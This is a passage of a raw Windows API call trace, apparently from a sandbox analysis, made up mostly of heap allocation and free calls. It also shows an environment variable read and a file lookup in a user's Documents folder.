(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0223.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0223.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0223.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0223.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0223.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0223.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0223.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0223.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0223.051] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0223.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0223.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0223.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaeb8 [0223.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0223.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0223.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf78 [0223.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0223.051] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0223.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0223.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0223.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0223.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0223.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0223.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0223.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0223.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0223.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0223.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0223.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0223.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0223.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0223.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0223.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0223.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0223.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854b00 [0223.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0223.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0223.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0223.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0223.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0223.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0223.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0223.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0223.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0223.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721b8 [0223.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0223.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0223.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0223.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0223.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721d8 [0223.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0223.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0223.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0223.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaafc0 [0223.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0223.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0223.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0223.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0223.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0223.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0223.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0223.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0223.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0223.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0223.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0223.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0223.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0223.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0223.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0223.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0223.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0223.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0223.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0223.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0223.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0223.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0223.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0223.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0223.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0223.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0223.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0223.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0223.053] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0223.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0223.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0223.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0223.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0223.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0223.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0223.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0223.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0223.054] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0223.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0223.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0223.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0223.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0223.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0223.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0223.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0223.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0223.054] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0223.054] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0223.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0223.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0223.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0223.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0223.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0223.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0223.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0223.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0223.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0223.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0223.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0223.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0223.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0223.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0223.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0223.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0223.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0223.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0223.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0223.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0223.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0223.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0223.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0223.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0223.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0223.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0223.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0223.055] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0223.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0223.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0223.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0223.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0223.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0223.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0223.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0223.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0223.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0223.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0223.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0223.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0223.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0223.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0223.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0223.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0223.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0223.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0223.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0223.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0223.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0223.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0223.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0223.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0223.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0223.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0223.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0223.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0223.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0223.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0223.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0223.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0223.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0223.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0223.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0223.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0223.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0223.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0223.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0223.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0223.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0223.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0223.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0223.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0223.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0223.057] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0223.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0223.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0223.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0223.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0223.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0223.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0223.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0223.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0223.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0223.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0223.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0223.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0223.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0223.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0223.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0223.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0223.058] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0223.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0223.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0223.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0223.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0223.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0223.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0223.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0223.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0223.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0223.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0223.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0223.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0223.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0223.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0223.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0223.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0223.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0223.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0223.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0223.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0223.059] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/_wc0ld1_h 9LSGLE.xlsx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd1ad9f0, ftCreationTime.dwHighDateTime=0x1d56740, ftLastAccessTime.dwLowDateTime=0xdb3b54e0, ftLastAccessTime.dwHighDateTime=0x1d5cd64, ftLastWriteTime.dwLowDateTime=0xdb3b54e0, ftLastWriteTime.dwHighDateTime=0x1d5cd64, nFileSizeHigh=0x0, nFileSizeLow=0x5c0d, dwReserved0=0x0, dwReserved1=0x0, cFileName="_wc0ld1_h 9LSGLE.xlsx", cAlternateFileName="_WC0LD~1.XLS")) returned 0x9e2238 [0223.059] FindClose (in: hFindFile=0x9e2238 | out: hFindFile=0x9e2238) returned 1 [0223.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0223.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0223.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0223.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0223.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0223.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0223.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0223.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0223.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0223.060] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0223.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0223.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0223.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0223.060] RtlAllocateHeap (HeapHandle=0x2af0000, 